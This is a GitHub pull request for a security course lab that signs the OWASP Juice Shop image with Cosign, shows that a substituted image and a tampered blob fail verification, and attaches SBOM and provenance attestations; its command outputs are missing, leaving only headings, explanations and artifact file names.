Feature/lab8#4
Open
raaller wants to merge 5 commits into
Open
Conversation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Goal
Sign the OWASP Juice Shop v20.0.0 container image by immutable digest using Cosign, demonstrate that a substituted image cannot pass signature verification, attach verified CycloneDX SBOM and SLSA provenance attestations, and implement blob signing as a mitigation for the Codecov 2021 attack class.
Changes
submissions/lab8.mdlabs/lab8/keys/cosign.publabs/lab8/keys/.gitignorecosign.keyfrom being committedlabs/lab8/results/Environment
Testing
Local registry and image push
Result:
Cosign image signing
Result:
Original image verification
Result:
Verified manifest digest:
Tampered-image verification
Alpine
3.20was pushed under a Juice Shop-looking tag:Tampered digest:
Verification:
Result:
The failure is expected because the signature is bound to the original immutable digest rather than the mutable image tag.
Original-image sanity verification
The original digest was verified again after the tamper test:
This confirms that pushing an unsigned image under another tag does not affect the signature associated with the original digest.
CycloneDX SBOM attestation
Verification:
Results:
The decoded attestation is bound to:
Predicate type:
SLSA provenance attestation
Verification:
Results:
Predicate type:
Blob signing
Created artifacts:
Original blob verification
Result:
Tampered-blob verification
A malicious payload was appended to a copy of the signed archive before verification.
Result:
The failure is expected because the signature is bound to the original artifact byte stream.
Security analysis
Digest binding
OCI tags are mutable and can be reassigned to different manifests. Cosign signs the immutable manifest digest, so replacing or retagging an image produces a different digest that cannot satisfy the original signature.
Signed SBOM
An image signature proves that a specific digest was approved by the expected signer, but it does not describe the image contents. The signed CycloneDX attestation provides a verifiable software inventory bound to the same digest, allowing admission policies and incident-response tooling to determine whether a vulnerable dependency is present.
Codecov 2021 mitigation
The Codecov uploader attack relied on consumers executing modified remote content without authenticating its bytes. Running
cosign verify-blobbefore executing the downloaded artifact would reject an attacker-modified uploader because the downloaded content would no longer match the signed artifact.Artifacts
Submission report:
submissions/lab8.mdCosign key material:
labs/lab8/keys/cosign.publabs/lab8/keys/.gitignoreImage signing evidence:
labs/lab8/results/juice-shop-digest.txtlabs/lab8/results/sign-image.txtlabs/lab8/results/verify-original.jsonlabs/lab8/results/verify-tampered.txtlabs/lab8/results/verify-tampered.exit-code.txtlabs/lab8/results/verify-original-sanity.jsonSBOM attestation evidence:
labs/lab8/results/sbom-attest.txtlabs/lab8/results/sbom-attestation-report-excerpt.jsonlabs/lab8/results/sbom-component-counts.txtlabs/lab8/results/sbom-component-count-diff.txtlabs/lab8/results/sbom-full-normalized-diff.txtProvenance evidence:
labs/lab8/results/provenance-predicate.jsonlabs/lab8/results/provenance-attest.txtlabs/lab8/results/provenance-statement.jsonlabs/lab8/results/provenance-verify.jsonlBlob-signing evidence:
labs/lab8/results/my-tool.tar.gzlabs/lab8/results/my-tool.tar.gz.bundlelabs/lab8/results/blob-sign.txtlabs/lab8/results/blob-verify-success.txtlabs/lab8/results/blob-tamper.txtlabs/lab8/results/blob-tamper.exit-code.txtThe private key
labs/lab8/keys/cosign.keyis intentionally excluded from Git.Checklist
feat(labN): <topic>conventionsubmissions/lab8.md